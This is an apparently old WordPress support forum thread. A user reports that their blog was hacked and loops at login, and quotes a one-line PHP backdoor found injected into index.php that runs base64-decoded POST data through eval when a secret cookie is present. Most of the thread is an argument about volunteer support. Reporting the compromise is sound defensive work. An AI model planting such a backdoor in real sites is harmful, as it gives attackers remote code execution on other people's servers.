WordPress.org

Ready to get started?Download WordPress

Forums

Login Hacked - Security Issue 2.6 (21 posts)

  1. viewsoj
    Member
    Posted 5 years ago #

    Our blog has been hacked and we are unable to login. When you try login you get looped back to the login page with no explanation/error message. The Blog is up and running and I can't see any issues (yet..).
    There were 2 files that were changed index.php and xmlrpc.php and I found this line added to the index file:
    <?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>

    Looking for help...
    Thank you.

  2. rfearns
    Member
    Posted 5 years ago #

    Experienced same problem after upgrading. Clearing my cookies allowed me back into my admin area.

  3. viewsoj
    Member
    Posted 5 years ago #

    I tried to login after clearing the cookies on both IE and Firefox. Nothing. It also doesn't explain the changed files and the extra line of code we found in the index.php file..

  4. viewsoj
    Member
    Posted 5 years ago #

    Tried to reset the login as well and nothing happened. Can't access the blog..Anyone have any ideas out there?

  5. teedubyaw
    Member
    Posted 5 years ago #

    Same thing happened to my site, CultivateGreatness.com

    It is a login loop. I noticed on my ftp, that each files had been downloaded and reuploaded... all dates are Sept 5 2007.

    Very bizarre.

    Whoever is doing this, isn't very thoughtful of others, and needs to find a more productive hobbies or find more malicious targets.

  6. iridiax
    Member
    Posted 5 years ago #

    Are you using 2.6.2 and did you set your three custom secret keys (cookie security measures) in wp-config.php?

  7. teedubyaw
    Member
    Posted 5 years ago #

    I was using 2.6 and haven't been able to do anything to the site since.

    I did do the upgrade to 2.6.2 but still not able to login.

  8. teedubyaw
    Member
    Posted 5 years ago #

    Does wordpress even look at the support area?

    I'm amazed at how little support this has received. Maybe its time to move my 15 blogs to a new platform, one with support?

  9. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    Just because you were hacked does not necessarily mean it's a WordPress problem. There's a lot of ways they could get in to your site, and most of them do not involve WordPress.

    Especially if your main index.php was changed, it's highly unlikely that they got in via WP to do that.

  10. teedubyaw
    Member
    Posted 5 years ago #

    well, it appears to be a non-isolated incident.

    Many people are having this same problem. Please think outside the box, and don't write off our support issues so quickly.

  11. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    don't write off our support issues so quickly.

    When you actually POST a real support issue that we're capable of helping you with, then rest assured, we will do our best.

    However you have not yet posted one single thing that merits any sort of response at all. You've asked no questions, you've posted no details, you have not even said what the results of the hack was, or talked about looking at the server logs to find the entry point. You've done nothing at all except complain. Inaccurately too.

    If you have a problem, then post a new thread describing the problem. Then, maybe, somebody will be kind enough to help you with this free product which you did not pay anybody anything for. Nobody here owes you anything just because you use their software.

    If you need support immediately, then I suggest you go find somebody to hire who can provide that support. Here, however, volunteers provide support for free. And you get what you pay for, bud.

    As for your 15 blogs, if you're unable to maintain or operate them without support, then yes, perhaps you should move to another platform.

  12. omgitztrey
    Member
    Posted 5 years ago #

    The only bad thing about WordPress is the attitude issue people have on this forum.

  13. teedubyaw
    Member
    Posted 5 years ago #

    yeah, after 3 days of ZERO support... not even a message... then yeah, I'm gonna have a bit of attitude.

    At least a moderator answered this thread finally.

    Obviously, I'm not the only one to have this problem, so it may be a larger issue than you are giving credit.

  14. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    What support do you want or expect? You posted nothing worth responding to. You've posted zero information. There is nothing of any value in this thread.

    I mean, honestly, WTF are you expecting us to say? "You got hacked? Bummer." This ain't no place for sympathy. There's nothing we can say to this thread because this thread has no answerable questions in it. It has a total lack of any useful information.

    If you get hacked, then I'm sorry, but that's YOUR problem. It's your website, so eventually it's always your problem. There are no currently known vulnerabilities in WordPress, so they probably didn't hack you through that door.

    And as far as the WordPress forum is concerned, that fact ends the discussion. We can't help you when there's nothing to help you with.

  15. vietknight
    Member
    Posted 5 years ago #

    yeah, after 3 days of ZERO support... not even a message... then yeah, I'm gonna have a bit of attitude.

    Did you NOT read what Otto just posted? This is a FREE PRODUCT, no one here HAS TO HELP YOU. You're not the only one with unanswered posts. Don't go justifying your attitude by saying you've received zero support.

  16. syncbox
    Member
    Posted 5 years ago #

    Especially since no support is implied anywhere.

    I've found that if you ask nicely, most of the time, someone helps out. There are some really great developers who DO listen and help here.

    On the other hand, I've certainly asked questions that get no answers at all. C'est la vie...

    Most of THOSE times, it's because I am trying to do something VERY funky!

    the wp-pro list has affordable professional help that I've hired before and had great results from... but expect to pay a reasonable amount for their time, it's worth it in every case I've experienced.

    Good luck with it!

  17. crustymusic99
    Member
    Posted 5 years ago #

    mean, honestly, WTF are you expecting us to say?

    Gee I don't know, not this? Considering it is a support forum something helpful would be nice.. I generally expect a mod to represent their team well, and your doing nothing to help come to a solution.

    Ever think of telling someone what information to provide to help solve the problem if they have not?

    You've done nothing at all except complain.

    No, bud, re-read his posts. He asked for help to a problem. Complaining would be what I'm doing to you. You work in customer service, that is part of "support". And telling someone to go find another platform is 100% opposite of what you need to be doing.

  18. syncbox
    Member
    Posted 5 years ago #

    but that is the point -- HE DOESN'T WORK IN CUSTOMER SUPPORT.

    there IS no customer support here.

  19. vietknight
    Member
    Posted 5 years ago #

    You work in customer service, that is part of "support".

    Definition of "customer": someone who pays for goods or services
    wordnet.princeton.edu/perl/webwn

    Otto is voluntarily offering his support to this forum. The support you are making reference to is to someone who's actually PAID for their product. There's a big difference between "work" and volunteer". You should be grateful that Otto's even replying to these issues.

    Someone who DEMANDS support when they has done nothing to earn it, is just plain incoherent.

    Read the GPL please:

    BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

  20. whooami
    Member
    Posted 5 years ago #

    I'll join the pileon, before this is locked.

    Ever think of telling someone what information to provide to help solve the problem if they have not?

    Its nice to think that one can be prodded to answer questions. Thats not the way it goes in the real world though, and especially not on the web.

    Why not?

    Because there are people that know what info to provide, and if they dont, they at least try. Those people, far and away, get more 'attention' because they tend to be easier to help.

    Consider that as volunteers, we get to pick and choose what we respond to. Why am I, or anyone else, going to pull teeth in one thread, when we can help 10 others in the same amount of time??

    And, well, to be honest, it's not our job to pry answers put of anyone. In the case of the person above with 15 blogs, someone like myself would be inclined to think that he/she ought to already know what info to provide. And, if not, than perhaps he/she ought to get a new hobby/job.

  21. iridiax
    Member
    Posted 5 years ago #

    A good first step before asking for help here is a forum search for keywords describing your problem or for unique words in your code or error message. Of course, it takes a little effort to wade through the threads, but then you don't have to wait around hoping that someone will answer.

Topic Closed

This topic has been closed to new replies.

About this Topic